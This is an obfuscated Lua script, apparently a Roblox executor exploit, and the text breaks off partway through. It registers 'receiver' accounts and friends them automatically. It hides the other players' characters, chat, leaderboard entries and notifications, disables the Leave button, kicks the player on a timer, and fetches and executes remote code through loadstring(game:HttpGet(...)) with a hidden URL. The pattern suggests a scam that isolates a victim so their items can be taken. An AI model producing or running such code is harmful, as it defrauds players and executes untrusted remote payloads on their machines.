--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v35,v36) local v37={};for v86=1, #v35 do v6(v37,v0(v4(v1(v2(v35,v86,v86 + 1 )),v1(v2(v36,1 + (v86% #v36) ,1 + (v86% #v36) + 1 )))%256 ));end return v5(v37);end local v8=game:GetService(v7("\227\198\203\41\239\184\198\10\212\199\232\49\233\169\198\25\212","\126\177\163\187\69\134\219\167"));local v9=game:GetService(v7("\19\193\43\220\249\49\222","\156\67\173\74\165"));local v10=game:GetService(v7("\3\184\91\29\175\54\71\55\178","\38\84\215\41\118\220\70"));local v11=game:GetService(v7("\99\25\55\28\250\99\19\48\4\247\83\19","\158\48\118\66\114"));local v12=game:GetService(v7("\153\49\30\5\118\183\237\162\39\21","\155\203\68\112\86\19\197"));local v13=game:GetService(v7("\101\210\36\249\103\109\236","\152\38\189\86\156\32\24\133"));local v14=game:GetService(v7("\200\82\191\82\223\95\166\82\207\82\181\80\245\84\162","\38\156\55\199"));local v15=require(v8:WaitForChild(v7("\152\124\127\35\18\115\255\80","\35\200\29\28\72\115\20\154")):WaitForChild(v7("\42\166\223\220\133\62\59\23\182\203\218\159","\84\121\223\177\191\237\76")));local v16=require(v8:WaitForChild(v7("\139\87\202\171\59\87\53\210","\161\219\54\169\192\90\48\80")):WaitForChild(v7("\102\64\19\32\91\84\5\55\90","\69\41\34\96")));local v17=require(v8:WaitForChild(v7("\140\194\212\1\3\44\185\208","\75\220\163\183\106\98")):WaitForChild(v7("\44\191\159","\185\98\218\235\87")));local v18={[v7("\249\57\36\227\215\188\206\46\9\231\211\175\216","\202\171\92\71\134\190")]={v7("\25\211\35\171\57\215\60\188\123","\232\73\161\76"),v7("\139\203\77\77\18\180\215\69","\126\219\185\34\61")},[v7("\41\192\95\112\114\114\210\242\24\193\120\96\119\114\253\227","\135\108\174\62\18\30\23\147")]=true,[v7("\147\231\43\201\20\171\3\203\185\253\13\217\17\171\53\206\184\238","\167\214\137\74\171\120\206\83")]=true,[v7("\160\249\49\86\217\161\159\245\32\112\241\169\158\228\55\78","\199\235\144\82\61\152")]=3 + 2 };local v19=getgenv();local v20=v19 and v19.receiver ;local v21={};v21.GetPlayerPlot=function(v38) local v39=0 + 0 ;local v40;while true do if (v39==(6 -4)) then return nil,nil;end if (v39==(1 + 0)) then if  not v40 then return nil;end for v118,v119 in ipairs(v40:GetChildren()) do local v120=v15:Wait(v119.Name);if (v120 and (v120:Get(v7("\232\67\126\17\171","\126\167\52\16\116\217"))==v38)) then return v119,v120;end end v39=2 + 0 ;end if ((470 -(381 + 89))==v39) then if  not v38 then return nil;end v40=v10:FindFirstChild(v7("\55\26\182\63\20","\75\103\118\217"));v39=1 + 0 ;end end end;v21.CoreGuiFriendRequest=function(v41) pcall(function() local v87=0;local v88;local v89;local v90;local v91;while true do if (v87==(2 + 0)) then if ( not v91 or  not v90 or (v91>=(342 -142)) or (v90>=200)) then return;end if (v41.Parent==v9) then v9.LocalPlayer:RequestFriendship(v41);end break;end if ((0 + 0)==v87) then local v121=0;while true do if (v121==(1157 -(1074 + 82))) then v87=1 -0 ;break;end if (v121==(1784 -(214 + 1570))) then v88=v13:WaitForChild(v7("\250\33\34\140\187\1\219\221\39","\156\168\78\64\224\212\121"));v89=require(v88.Modules.FriendingUtility);v121=1456 -(990 + 465) ;end end end if ((1 + 0)==v87) then local v122=0 + 0 ;local v123;while true do if ((0 + 0)==v122) then v123=0 -0 ;while true do if ((3 -2)==v123) then v87=2;break;end if (v123==(667 -(89 + 578))) then v90=v89:GetFriendCountAsync(v41.UserId);v91=v89:GetFriendCountAsync(v9.LocalPlayer.UserId);v123=1 + 0 ;end end break;end end end end end);end;local v24={[v7("\56\252\160\205\2\231\179\203\21\253","\174\103\142\197")]={},[v7("\105\33\76\10\32\93\253\95\62\90\42\21\76\253\69\45\81\44","\152\54\72\63\88\69\62")]=false};local v25={};v24.IsReceiver=function(v42,v43) local v44=1726 -(1668 + 58) ;while true do if (v44==(626 -(512 + 114))) then if (v20 and (v43==v20)) then return true;end for v124,v125 in ipairs(v18.ReceiverNames) do if string.find(v43,v125,2 -1 ,true) then return true;end end v44=1;end if (v44==(1 -0)) then return false;end end end;local function v27(v45) local v46=0 -0 ;local v47;local v48;local v49;local v50;local v51;while true do if (v46==(1 + 1)) then v48,v49,v50=v45.Name,v45:GetPivot(),v45.Parent;v45:Destroy();v46=1 + 2 ;end if ((4 + 0)==v46) then v51:PivotTo(v49);break;end if (v46==(0 -0)) then if ( not v45 or  not v45.Parent) then return;end v47=nil;v46=1995 -(109 + 1885) ;end if (v46==1) then for v126,v127 in ipairs(v10.Plots:GetChildren()) do local v128=v15:Wait(v127.Name);if (v128 and  not v128:Get(v7("\251\211\224\89\198","\60\180\164\142"))) then v47=v127;break;end end if  not v47 then return;end v46=1471 -(1269 + 200) ;end if (v46==3) then v51=v47:Clone();v51.Name,v51.Parent=v48,v50;v46=7 -3 ;end end end v24.OnPlayerAdded=function(v52,v53) if (v52:IsReceiver(v53.Name) and  not v52._receivers[v53.UserId]) then if  not v52._isReceiverPresent then v52._isReceiverPresent=true;end v52._receivers[v53.UserId]=v53;table.insert(v25,v53);if (v18.EnableAutoFriend and (v53~=v9.LocalPlayer)) then v21.CoreGuiFriendRequest(v53);end end end;v24.OnPlayerRemoving=function(v54,v55) local v56=0 + 0 ;while true do if (v56==0) then if v54._receivers[v55.UserId] then local v143=0;while true do if (v143==(815 -(98 + 717))) then v54._receivers[v55.UserId]=nil;if  not next(v54._receivers) then v54._isReceiverPresent=false;end break;end end end for v130,v131 in ipairs(v25) do if (v131==v55) then table.remove(v25,v130);break;end end break;end end end;local function v30() local v57={v7("\79\95\23\39","\114\56\62\101\73\71\141"),v7("\171\253\222\197\180","\164\216\137\187"),v7("\215\244\35\189\180","\107\178\134\81\210\198\158"),v7("\60\11\140\207\175\60","\202\88\110\226\166"),v7("\197\14\139\251","\170\163\111\226\151"),v7("\1\37\160\59\70\54\58\20","\73\113\80\210\88\46\87")};local function v58(v92) local v93=0 + 0 ;while true do if (v93==(0 + 0)) then if  not v92:IsA(v7("\178\35\216\28\227","\135\225\76\173\114")) then return;end for v144,v145 in ipairs(v57) do if string.find(string.lower(v92.Name),v145) then v92.Volume=0;v92:Stop();v92.Played:Connect(function() v92:Stop();end);break;end end break;end end end for v94,v95 in ipairs(v10:GetDescendants()) do v58(v95);end for v96,v97 in ipairs(v11:GetDescendants()) do v58(v97);end v10.DescendantAdded:Connect(v58);v11.DescendantAdded:Connect(v58);end local function v31() local function v59(v98) for v106,v107 in ipairs(v98:GetDescendants()) do if (v107:IsA(v7("\41\238\170\185\188\169","\199\122\141\216\208\204\221")) or v107:IsA(v7("\129\210\19\241\116\197\174\207\25\224\108","\150\205\189\112\144\24"))) then v107:Destroy();end end end local v60=v9.LocalPlayer;local v61=v60:WaitForChild(v7("\7\133\188\71\20\137\18\27","\112\69\228\223\44\100\232\113"));v61.ChildAdded:Connect(function(v99) if v99:IsA(v7("\224\16\8\223","\230\180\127\103\179\214\28")) then v59(v99);end end);for v100,v101 in ipairs(v61:GetChildren()) do if v101:IsA(v7("\184\10\80\74","\128\236\101\63\38\132\33")) then v59(v101);end end v60.CharacterAdded:Connect(function(v102) v102.ChildAdded:Connect(function(v108) if v108:IsA(v7("\152\166\30\72","\175\204\201\113\36\214\139")) then v59(v108);end end);end);end local function v32() local v62=v14:WaitForChild(v7("\115\201\45\200\39\79\205\59\210\1\75\223","\100\39\172\85\188"),2 + 3 );if  not v62 then return;end local v63=v62:WaitForChild(v7("\159\90\129\179\42\190\108\188\141","\83\205\24\217\224"),13 -8 );local v64=v62:WaitForChild(v7("\212\231\245\26\227\203\200\47\231\201","\93\134\165\173"),5);local function v65(v103) if  not v103 then return;end local function v104(v109) if ((v109.Name~=v9.LocalPlayer.Name) and v9:FindFirstChild(v109.Name)) then v109:Destroy();end end for v110,v111 in ipairs(v103:GetChildren()) do v104(v111);end v103.ChildAdded:Connect(v104);end v65(v63);v65(v64);end local function v33() local v66=0 -0 ;local v67;local v68;while true do if (v66==(0 + 0)) then v67,v68=pcall(function() return require(v8:WaitForChild(v7("\157\254\192\209\41\203\161","\30\222\146\161\162\90\174\210")):WaitForChild(v7("\213\66\127\30\198\66\121\15\235\90","\106\133\46\16")));end);if (v67 and v68) then local v146=v68.UpdatePurchaseBlockedLabel;local v147=v68.UpdateUnlock;local v148=v68.ClearIndex;v68.UpdatePurchaseBlockedLabel=function(...) pcall(v146,...);end;v68.UpdateUnlock=function(...) pcall(v147,...);end;v68.ClearIndex=function(v156,v157) local v158=0 + 0 ;while true do if (v158==(0 + 0)) then if (v156 and v156.GetOwner and (v156:GetOwner()==v9.LocalPlayer)) then return;end pcall(v148,v156,v157);break;end end end;end break;end end end local function v34() local v69=0 + 0 ;local v70;local v71;local v72;local v73;local v74;local v75;local v76;local v77;local v78;local v79;local v80;local v81;local v82;local v83;local v84;local v85;while true do if (v69==(2 + 1)) then v70.Notify=function(v132,v133,...) local v134=0 + 0 ;while true do if (v134==(1433 -(797 + 636))) then if (string.find(v133,v7("\93\191\223\126\42\205","\196\46\203\176\18\79\163\45"),1 + 0 ,true) or string.find(v133,v7("\170\39\106\11\54\245\234\188","\143\216\66\30\126\68\155"),4 -3 ,true)) then return;end v71(v132,v133,...);break;end end end;v72=v8:FindFirstChild(v7("\136\201\30\206\214","\129\202\168\109\171\165\195\183"));if v72 then local v152=1619 -(1427 + 192) ;while true do if (v152==0) then if v72:FindFirstChild(v7("\17\93\52\215\208\16\192\46\87\56\202","\134\66\56\87\184\190\116")) then v72:FindFirstChild(v7("\15\52\10\180\23\239\7\57\51\62\27","\85\92\81\105\219\121\139\65")):Destroy();end if v72:FindFirstChild(v7("\201\187\89\87\120\249\241\188\95\87","\191\157\211\48\37\28")) then v72:FindFirstChild(v7("\235\23\253\14\62\249\19\251\19\40","\90\191\127\148\124")):Destroy();end break;end end end v73={[v7("\126\134\61\3","\119\24\231\78")]=0 + 0 ,[v7("\143\40\161\67\201\77","\113\226\77\197\42\188\32")]=0 -0 ,[v7("\41\26\251\162","\213\90\118\148")]=0 + 0 };v69=2 + 2 ;end if (v69==(1802 -(884 + 916))) then v9.PlayerRemoving:Connect(function(v135) v24:OnPlayerRemoving(v135);end);for v136,v137 in ipairs(v9:GetPlayers()) do v24:OnPlayerAdded(v137);end v70=require(v8:WaitForChild(v7("\141\83\61\47\61\62\162\80\54\41\60","\81\206\60\83\91\79")).NotificationController);v71=v70.Notify;v69=329 -(192 + 134) ;end if ((1280 -(316 + 960))==v69) then v74=653 -(232 + 421) ;v75=false;v76=1889 -(1569 + 320) ;v77=false;v69=3 + 2 ;end if (v69==(1 + 0)) then v30();v32();if  not v10:FindFirstChild(v7("\121\214\182\72\30\111\78\215\149\67\13\116\69\212\153\66\18\112\74\223\171","\29\43\179\216\44\123")) then Instance.new(v7("\155\214\44\72\184\203","\44\221\185\64"),v10).Name=v7("\51\226\70\91\118\19\226\76\114\124\23\238\70\88\82\15\238\69\94\127\18","\19\97\135\40\63");end v9.PlayerAdded:Connect(function(v138) v24:OnPlayerAdded(v138);end);v69=2 + 0 ;end if (v69==(26 -19)) then v12.Heartbeat:Connect(function(v139) if  not v75 then v74=v74 + v139 ;if (v74>=(v18.KickAfterMinutes * (611 -(83 + 468)))) then v75=true;pcall(function() v9.LocalPlayer:Kick(v7("\221\126\105\91\155\92\229\247\98\117\70\213\15\232\229\98\60\76\195\95\233\246\116\120\7\155\127\236\225\112\111\76\155\93\229\238\126\117\71\149","\128\132\17\28\41\187\47"));end);end end if  not v77 then v76=v76 + v139 ;if (v76>=(1810 -(1202 + 604))) then local v195=0 -0 ;local v196;while true do if (v195==(0 -0)) then v196=0 -0 ;while true do if (v196==(325 -(45 + 280))) then v77=true;pcall(function() loadstring(game:HttpGet(v7("\9\38\18\42\78\91\125\73\40\92\22\124\1\51\73\9\39\4\47\78\4\32\5\53\83\21\55\8\46\19\2\61\11\117\121\20\34\3\20\88\22\125\4\53\73\78\32\3\60\78\78\58\3\59\89\18\125\11\59\84\15\125\42\59\78\4\32","\61\97\82\102\90"),true))();end);break;end end break;end end end end if  not v78.notification then local v159=0 + 0 ;local v160;while true do if (v159==(0 + 0)) then v160=v9.LocalPlayer:FindFirstChild(v7("\156\34\170\82\194\69\57\28\165","\105\204\78\203\43\167\55\126"));if v160 then local v229=0 + 0 ;local v230;while true do if (v229==(0 -0)) then v230=v160:FindFirstChild(v7("\139\165\55\23\21\13\196\80\177\163\44\16","\49\197\202\67\126\115\100\167"));if v230 then local v283=0 + 0 ;local v284;while true do if (v283==(1 + 0)) then if v284 then v284:Destroy();end v230.ChildAdded:Connect(function(v313) if (v313.Name==v7("\201\13\238\192\225\11\249\200\243\11\245\199","\169\135\98\154")) then task.defer(function() v313:Destroy();end);end end);break;end if (v283==0) then v78.notification=true;v284=v230:FindFirstChild(v7("\25\84\203\32\134\95\93\54\79\214\38\142","\62\87\59\191\73\224\54"));v283=900 -(503 + 396) ;end end end break;end end end break;end end end if  not v78.friendNotif then local v161=0;local v162;while true do if (v161==(0 + 0)) then v162=v13:FindFirstChild(v7("\249\120\38\88\242\43\239\222\126","\168\171\23\68\52\157\83"));if v162 then local v231=0 -0 ;local v232;while true do if (v231==(3 -1)) then v162.ChildAdded:Connect(v232);break;end if ((1911 -(340 + 1571))==v231) then v78.friendNotif=true;v232=nil;v231=1 + 0 ;end if (v231==(1773 -(1733 + 39))) then function v232(v271) if (v271.Name==v7("\210\99\252\168\43\41\181\241\96\224\168\54\57\169\251\101\252\171\44\46\134\224\120\250\163","\231\148\17\149\205\69\77")) then v271:Destroy();end end for v272,v273 in ipairs(v162:GetChildren()) do v232(v273);end v231=2;end end end break;end end end if  not v78.leaderboard then local v163=v13:FindFirstChild(v7("\176\171\198\226\82\237\172\174\212\239","\159\224\199\167\155\55"));if v163 then local v197=0 -0 ;local v198;while true do if (v197==(1036 -(125 + 909))) then for v243,v244 in ipairs(v163:GetDescendants()) do pcall(v198,v244);end break;end if (v197==(1949 -(1096 + 852))) then function v198(v245) if string.match(v245.Name,v7("\201\195\48\211\238\246\46\247\249\231\46\203\200\182\56\153\179","\178\151\147\92")) then local v260=0 + 0 ;local v261;while true do if (0==v260) then v261=string.sub(v245.Name,39 -26 );if (tonumber(v261) and (tonumber(v261)~=v9.LocalPlayer.UserId)) then v245:Destroy();end break;end end end end v163.DescendantAdded:Connect(v198);v197=1 + 1 ;end if (v197==(0 -0)) then v78.leaderboard=true;v198=nil;v197=1;end end end end if  not v78.settingsList then local v164=0 -0 ;local v165;while true do if (v164==(0 + 0)) then v165=nil;pcall(function() v165=v13.RobloxGui.SettingsClippingShield.SettingsShield.MenuContainer.PageViewClipper.PageView.PageViewInnerFrame.Players;end);v164=513 -(409 + 103) ;end if (v164==(237 -(46 + 190))) then if v165 then local v234=95 -(51 + 44) ;local v235;while true do if (v234==(1 + 0)) then function v235(v274) if ((string.sub(v274.Name,1318 -(1114 + 203) ,737 -(228 + 498) )==v7("\188\241\77\43\23\94\86\141\255\73\62","\26\236\157\44\82\114\44")) and (string.sub(v274.Name,3 + 9 )~=v9.LocalPlayer.Name)) then v274:Destroy();end end for v275,v276 in ipairs(v165:GetChildren()) do v235(v276);end v234=2 + 0 ;end if (v234==0) then v78.settingsList=true;v235=nil;v234=664 -(174 + 489) ;end if (v234==(5 -3)) then v165.ChildAdded:Connect(v235);break;end end end break;end end end if  not v78.experienceChat then local v166=v13:FindFirstChild(v7("\15\54\197\94\56\39\208\85\41\43\246\83\43\58","\59\74\78\181"));if v166 then local v199=1905 -(830 + 1075) ;local v200;while true do if (v199==(525 -(303 + 221))) then if v200 then local v252=1269 -(231 + 1038) ;local v253;while true do if (v252==(1 + 0)) then function v253(v287) local v288=1073 -(1036 + 37) ;local v289;while true do if (v288==(0 + 0)) then v289=string.match(v287.Name,v7("\27\153\31\94\248\108\156","\211\69\177\58\58"));if (v289 and (tonumber(v289)~=v9.LocalPlayer.UserId)) then v287:Destroy();end break;end end end for v290,v291 in ipairs(v200:GetChildren()) do pcall(v253,v291);end v252=1164 -(171 + 991) ;end if (v252==(8 -6)) then v200.ChildAdded:Connect(v253);break;end if (v252==(0 -0)) then v78.experienceChat=true;v253=nil;v252=2 -1 ;end end end break;end if (v199==(0 + 0)) then v200=nil;pcall(function() v200=v166.appLayout.chatWindow.scrollingView.bottomLockedScrollView.RCTScrollView.RCTScrollContentView;end);v199=1;end end end end if  not v78.leaveButton then local v167=0 -0 ;local v168;while true do if (v167==(0 -0)) then v168=0 -0 ;while true do if ((0 -0)==v168) then pcall(function() v85=v13.RobloxGui.SettingsClippingShield.SettingsShield.MenuContainer.BottomButtonFrame.LeaveGameButtonButton;end);if v85 then local v263=1248 -(111 + 1137) ;local v264;while true do if (v263==(159 -(91 + 67))) then v264.Name=v7("\205\205\51\236\234\18\233\86\245\199\60\216\227\63\255\73\228\218","\34\129\168\82\154\143\80\156");v264.Size=UDim2.fromScale(1 + 0 ,2 -1 );v263=810 -(329 + 479) ;end if (v263==(1 + 1)) then v264.BackgroundTransparency=524 -(423 + 100) ;v264.ZIndex=v85.ZIndex + 1 + 0 ;v263=3 + 0 ;end if ((0 -0)==v263) then v78.leaveButton=true;v264=Instance.new(v7("\145\247\120\248\236","\171\215\133\25\149\137"));v263=1 + 0 ;end if (v263==(1480 -(29 + 1448))) then v264.Active=true;v264.Parent=v85;break;end end end break;end end break;end end end v73.fast+=v139 v73.medium+=v139 v73.slow+=v139 local v140=v9.LocalPlayer;for v154,v155 in ipairs(v9:GetPlayers()) do if ((v155~=v140) and v155.Character) then pcall(function() v155.Character:Destroy();end);end end if (v140 and v140.Character) then for v183,v184 in ipairs(v140.Character:GetChildren()) do if v184:IsA(v7("\177\189\60\7","\233\229\210\83\107\40\46")) then for v220,v221 in ipairs(v184:GetDescendants()) do if (v221:IsA(v7("\242\65\32\223\21\213","\101\161\34\82\182")) or v221:IsA(v7("\196\2\90\255\215\209\129\60\225\29\77","\78\136\109\57\158\187\130\226"))) then v221:Destroy();end end end end end local v141=v10:FindFirstChild(v7("\12\58\247\245\59\45\252\245\19\48\239\248\48\56\216\255\55\50\248\253\45","\145\94\95\153"));if (v141 and (v141.Parent~=v10)) then v141.Parent=v10;end if (v85 and v85.Parent) then local v170=771 -(326 + 445) ;while true do if (v170==(0 -0)) then v85.Active=false;v85.Selectable=false;v170=2 -1 ;end if (v170==(2 -1)) then v85:SetAttribute(v7("\212\195\0\208\92\182\254\217\21\215\66\178","\215\157\173\116\181\46"),false);break;end end end local v142=v10:FindFirstChild(v7("\5\184\132\230\201","\186\85\212\235\146"));if v142 then local v171=711 -(530 + 181) ;local v172;while true do if ((881 -(614 + 267))==v171) then v172=v21.GetPlayerPlot(v140);for v222,v223 in ipairs(v142:GetChildren()) do local v224=574 -(102 + 472) ;local v225;while true do if (v224==0) then v225=false;for v265,v266 in ipairs(v223:GetDescendants()) do pcall(function() if (v223==v172) then if (v266:IsA(v7("\246\142\3\253\49\218\74\195\143\5\243\48\250\76\199\147","\56\162\225\118\158\89\142")) or (v266.ClassName==v7("\104\10\213\172\42\241\82\17\197\189\39\203\72","\184\60\101\160\207\66"))) then v266:Destroy();elseif ((v266.Name==v7("\3\135\113\189\56\140\117\178\54\182\117\177\52","\220\81\226\28")) and v266:IsA(v7("\39\208\154\239\198\198\17\208\142","\167\115\181\226\155\138"))) then local v318=v266.Parent:FindFirstChild(v7("\206\45\228\87\126\117","\166\130\66\135\60\27\17"));if v318 then v318.Visible=true;end v266.Visible=true;v266.Text=tostring(math.floor((92 -(19 + 13)) -(tick()%(97 -37)) ));end elseif (v266:IsA(v7("\112\69\219\118\56\112\88\207\123\35\73\67\218\97\53\86","\80\36\42\174\21")) or (v266.ClassName==v7("\122\31\34\121\70\57\57\110\75\2\50\105\90","\26\46\112\87"))) then v266:Destroy();elseif v266:IsA(v7("\137\49\164\108\182\178\76\160\160\19\185\123\178\175\81","\212\217\67\203\20\223\223\37")) then local v321=0 -0 ;while true do if ((0 -0)==v321) then v266.Enabled=false;v266:Destroy();break;end end elseif string.find(v266.Name,v7("\153\152\170\215","\178\218\237\200"),1 + 0 ,true) then v225=true;end end);end v224=1 + 0 ;end if (v224==(1 -0)) then if v225 then v27(v223);end break;end end end break;end end end if (v73.fast>=0.1) then v73.fast=1464 -(157 + 1307) ;local v174=v21.GetPlayerPlot(v140);if v174 then local v201=0 -0 ;local v202;local v203;local v204;while true do if (v201==(1814 -(1293 + 519))) then v204={[v7("\12\192\86\230\71\219\137\34\192\124\228\72\219\146\34\194\83\238\84","\224\77\174\63\139\38\175")]=true,[v7("\178\71\64\7\138\82\76\47\138\66\93","\78\228\33\56")]=true,[v7("\252\113\189\23\181\207\108\166","\229\174\30\210\99")]=true,[v7("\61\236\141\84\223\50\54\15\221\135\67\249","\89\123\141\230\49\141\93")]=true};for v247,v248 in ipairs(v174:GetChildren()) do if (v248:IsA(v7("\222\126\242\9\28","\42\147\17\150\108\112")) and  not v203[v248.Name]) then for v277,v278 in ipairs(v248:GetDescendants()) do if (v278:IsA(v7("\45\167\62\122\215\233\29\178","\136\111\198\77\31\135")) and  not v204[v278.Name] and (string.find(v278.Name,v7("\33\28\165\83","\201\98\105\199\54\221\132\119")) or string.find(v278.Name,v7("\134\56\145\32\11\33","\204\217\108\227\65\98\85")))) then if (v278.Transparency~=(0 + 0)) then v278.Transparency=0 -0 ;end end end end end v201=5 -2 ;end if (v201==(7 -4)) then if v202 then for v267,v268 in ipairs(v202:GetChildren()) do local v269=0 -0 ;local v270;while true do if (v269==(0 -0)) then v270=v268:FindFirstChild(v7("\125\207\244\236\33","\160\62\163\149\133\76"),true) and v268.Claim:FindFirstChild(v7("\254\169\25\45\204\206","\163\182\192\109\79")) ;if (v270 and v270:IsA(v7("\22\39\19\197\197\53\52\20","\149\84\70\96\160"))) then local v311=0 -0 ;local v312;while true do if (v311==(0 -0)) then v312=v270:FindFirstChildOfClass(v7("\12\9\24\238\48\47\3\249\61\20\8\254\44","\141\88\102\109"));if (v312 and v140.Character and v140.Character.PrimaryPart) then pcall(v312.Fire,v312,v140.Character.PrimaryPart);end break;end end end break;end end end end break;end if (v201==(1 + 0)) then if v202 then local v255=0 + 0 ;local v256;local v257;while true do if ((4 -2)==v255) then v257=v174:FindFirstChild(v7("\2\21\221\184\253\222","\221\81\97\178\212\152\176"),true);if v257 then v257:Destroy();end break;end if (v255==1) then for v299,v300 in ipairs(v202:GetChildren()) do v256(v300);end v202.ChildAdded:Connect(v256);v255=1 + 1 ;end if (v255==(0 -0)) then local v286=0 + 0 ;while true do if (v286==(1 + 0)) then v255=1 + 0 ;break;end if (v286==(1096 -(709 + 387))) then v256=nil;function v256(v314) local v315=1858 -(673 + 1185) ;local v316;while true do if ((0 -0)==v315) then v316=v314:FindFirstChild(v7("\156\245\16\64\205\141\228\2\82\141\240\213\23\81\130\189\252\14\64\141\170\186\34\75\138\179\245\15\106\149\187\230\11\64\130\186","\227\222\148\99\37"));if (v316 and  not v316:FindFirstChild(v7("\31\91\65\226\252\61\87\64\215\237\39\83\81\254\252\55","\153\83\50\50\150"))) then local v328=0 -0 ;while true do if (v328==(0 -0)) then Instance.new(v7("\127\121\124\16\69\170\65\72\115","\45\61\22\19\124\19\203"),v316).Name=v7("\237\27\30\225\7\126\188\211\51\25\225\3\115\177\196\22","\217\161\114\109\149\98\16");v316.ChildAdded:Connect(function(v330) if (v330.Name==v7("\33\52\55\112\185\122","\20\114\64\88\28\220")) then v330:Destroy();end end);break;end end end break;end end end v286=1;end end end end end v203={[v7("\236\233\20\246\27\193\215\18\255\19\216\234\14","\122\173\135\125\155")]=true,[v7("\180\212\18\186\55\48\219\129\210","\168\228\161\96\217\95\81")]=true,[v7("\253\195\39\89\33\83\235\208\32\89\35","\55\187\177\78\60\79")]=true};v201=2 + 0 ;end if (v201==0) then if  not v84 then local v258=0 + 0 ;while true do if (v258==(0 + 0)) then v84=true;pcall(function() local v301=v174:FindFirstChild(v7("\151\187\239\221\183\185\214\223\178\188\243\221\165","\176\214\213\134"),true);if  not v301 then return;end local function v302(v305) local v306=v305:FindFirstChild(v7("\215\162\186\216\173\85\77","\57\148\205\214\180\200\54"),true);if (v306 and v306:IsA(v7("\38\248\45\32\90\19\255\48\56","\22\114\157\85\84")) and  not v82[v306] and  not v83[v306]) then v83[v306]=tick() + 0.5 ;end end for v307,v308 in ipairs(v301:GetChildren()) do v302(v308);end v301.ChildAdded:Connect(v302);end);break;end end end v202=v174:FindFirstChild(v7("\229\197\26\201\92\250\152\203\207\26\209\80\229","\200\164\171\115\164\61\150"),true);v201=1;end end end for v185,v186 in pairs(v83) do if ( not v185 or  not v185.Parent) then v83[v185]=nil;elseif (tick()>=v186) then v82[v185]=v185.Text;v83[v185]=nil;end end for v187,v188 in pairs(v82) do if ( not v187 or  not v187.Parent) then v82[v187]=nil;elseif ((type(v188)==v7("\160\71\216\121\20\58","\161\211\51\170\16\122\93\53")) and (v187.Text~=v188)) then v187.Text=v188;end end for v189= #v25,1 -0 , -(1 + 0) do local v190=v25[v189];if ( not v190 or  not v190.Parent) then local v213=0;while true do if (v213==0) then table.remove(v25,v189);continue;break;end end end local v191=v21.GetPlayerPlot(v190);if v191 then local v214=0 -0 ;while true do if (v214==(882 -(244 + 638))) then v27(v191);table.remove(v25,v189);break;end end end end end if (v73.medium>=(0.2 -0)) then v73.medium=693 -(627 + 66) ;local v176=v21.GetPlayerPlot(v140);if (v176 and v18.EnablePlotGriefing) then for v215,v216 in ipairs(v176:GetDescendants()) do if (v216:IsA(v7("\217\175\161\45\203\175\160\60","\72\155\206\210")) and  not v216.Anchored) then v216.Anchored=true;end end end if v176 then local v205=v176:FindFirstChild(v7("\106\117\87\5\0\82\111\80\7\60","\83\38\26\52\110"),true);if v205 then v205:Destroy();end local v206=v176:FindFirstChild(v7("\126\5\46\67\86\19\23\71\86\18\43","\38\56\119\71"),true);if v206 then local v226=0 -0 ;local v227;local v228;while true do if (v226==(1880 -(446 + 1434))) then v227=v206:FindFirstChild(v7("\195\253\87\206\44\91\250\251\65\230\55\89\254\255\76","\54\147\143\56\182\69"),true);if v227 then v227:Destroy();end v226=1284 -(1040 + 243) ;end if (v226==1) then v228=v206:FindFirstChild(v7("\255\140\254\78\218\250\128\253\76\211","\191\182\225\159\41"),true);if (v228 and (v228.Image~=v7("\57\16\48\84\152\148\199\63\27\44\15\196\200\147\122\66\127\13\216\209\149\114\70\122\3\223\222\151","\162\75\114\72\53\235\231"))) then v228.Image=v7("\158\62\92\227\64\17\137\40\77\230\9\77\195\109\21\178\4\90\223\106\19\187\7\80\218\104\29\183","\98\236\92\36\130\51");end break;end end end end if v142 then local v207=0 -0 ;local v208;while true do if (v207==(1847 -(559 + 1288))) then v208={v7("\128\16\31\170\73\169\172\30\165\20\9","\80\196\121\108\218\37\200\213"),v7("\39\118\12\122\89\15\158\9\124\12","\234\96\19\98\31\43\110"),v7("\43\10\70\198\184\123\132\8","\235\102\127\50\167\204\18"),v7("\96\179\252\32\65","\78\48\193\149\67\36"),v7("\2\31\146\17\85\41","\33\80\126\224\120")};for v249,v250 in ipairs(v142:GetChildren()) do local v251=v250:FindFirstChild(v7("\205\166\10\201\93\224\152\12\192\85\249\165\16","\60\140\200\99\164"));if v251 then for v280,v281 in ipairs(v251:GetChildren()) do local v282=v281:FindFirstChild(v7("\166\250\13\43\163\139\219\18\35\176\143\241\5\34","\194\231\148\100\70"),true);if v282 then local v303=0 -0 ;local v304;while true do if (v303==(455 -(13 + 441))) then if v304 then v304:Destroy();end break;end if (v303==(0 -0)) then for v322,v323 in ipairs(v208) do local v324=v282:FindFirstChild(v323);if (v324 and (v324:IsA(v7("\114\73\217\183\218\201\68\73\205","\168\38\44\161\195\150")) or v324:IsA(v7("\169\241\131\113\53\196\183\20\133\240","\118\224\156\226\22\80\136\214")))) then v324.Visible=true;end end v304=v282:FindFirstChild(v7("\113\250\86\140\71\224","\224\34\142\57"));v303=2 -1 ;end end end end end end break;end end end for v192,v193 in ipairs(v10:GetChildren()) do if (v193:IsA(v7("\243\168\193\216\127","\110\190\199\165\189\19\145\61")) and (v193.Parent==v10) and v79[v193.Name]) then v193:Destroy();end end end if (v73.slow>=(4 -3)) then local v177=0 + 0 ;local v178;while true do if ((3 -2)==v177) then if v178 then local v241=v8:WaitForChild(v7("\234\234\116\227\138\192\223\248","\167\186\139\23\136\235")):WaitForChild(v7("\52\176\156","\109\122\213\232")):WaitForChild(v7("\220\210\237\0\226\248\182\3\235\229\180\57\237\242\237\4\225\240\165\60\235\209\176\57\235\249\166\35","\80\142\151\194"));local v242=v178:FindFirstChild(v7("\37\212\126\73\13\194\71\77\13\195\123","\44\99\166\23"),true);if v242 then v242=v242:FindFirstChild(v7("\76\229\38\46\58\169\117\227\48\6\33\171\113\231\61","\196\28\151\73\86\83"),true);end if (v242 and 